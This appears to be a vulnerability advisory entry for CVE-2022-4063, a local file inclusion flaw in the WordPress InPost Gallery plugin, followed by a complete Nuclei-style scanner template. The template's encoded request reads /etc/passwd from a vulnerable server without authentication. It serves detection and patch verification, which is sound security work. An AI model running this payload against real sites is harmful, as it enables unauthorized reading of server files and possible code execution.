CVE-2022-4063: WordPress InPost Gallery <2.1.4.1 - Local File Inclusion

日期: 2025-08-01 | 影响软件: WordPress InPost Gallery | POC: 已公开

漏洞描述

WordPress InPost Gallery plugin before 2.1.4.1 is susceptible to local file inclusion. The plugin insecurely uses PHP's extract() function when rendering HTML views, which can allow attackers to force inclusion of malicious files and URLs. This, in turn, can enable them to execute code remotely on servers.

PoC代码[已公开]

id: CVE-2022-4063

info:
  name: WordPress InPost Gallery <2.1.4.1 - Local File Inclusion
  author: theamanrawat
  severity: critical
  description: |
    WordPress InPost Gallery plugin before 2.1.4.1 is susceptible to local file inclusion. The plugin insecurely uses PHP's extract() function when rendering HTML views, which can allow attackers to force inclusion of malicious files and URLs. This, in turn, can enable them to execute code remotely on servers.
  impact: |
    The vulnerability allows an attacker to read arbitrary files on the server, potentially exposing sensitive information or executing malicious code.
  remediation: Fixed in version 2.1.4.1.
  reference:
    - https://wpscan.com/vulnerability/6bb07ec1-f1aa-4f4b-9717-c92f651a90a7
    - https://wordpress.org/plugins/inpost-gallery/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4063
    - https://github.com/cyllective/CVEs
    - https://github.com/im-hanzou/INPGer
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4063
    cwe-id: CWE-22
    epss-score: 0.91176
    epss-percentile: 0.99637
    cpe: cpe:2.3:a:pluginus:inpost_gallery:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: pluginus
    product: inpost_gallery
    framework: wordpress
  tags: cve2022,cve,wp-plugin,wp,inpost-gallery,lfi,wordpress,unauth,wpscan,pluginus

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ=="

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/html"

      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402204450987c2b6bf0ec51d8181f1a2455160f4d8fa2ac1806bab212fbbf4c8648bb02202c4d08e040cfe933c789cff26b0ac824de63cb08a3156f86aae4077b75890db9:922c64590222798bb761d5b6d8e72950